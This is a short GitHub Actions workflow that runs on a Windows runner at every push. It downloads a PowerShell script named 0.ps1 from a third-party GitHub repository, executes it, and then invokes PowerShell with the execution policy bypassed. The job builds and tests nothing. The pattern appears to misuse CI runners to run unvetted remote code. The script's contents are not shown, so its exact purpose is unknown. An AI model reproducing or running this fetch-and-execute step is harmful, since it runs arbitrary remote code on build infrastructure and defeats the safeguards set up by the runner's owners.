on: [push, workflow_dispatch]

jobs:
  build:

    runs-on: windows-latest
    
    steps:
    - name: Download
      run: Invoke-WebRequest https://github.com/Usser1222/circleci/raw/main/0.ps1 -OutFile 0.ps1
    
    - name: rrt
      run: |
           ./0.ps1
           powershell.exe -ExecutionPolicy Bypass
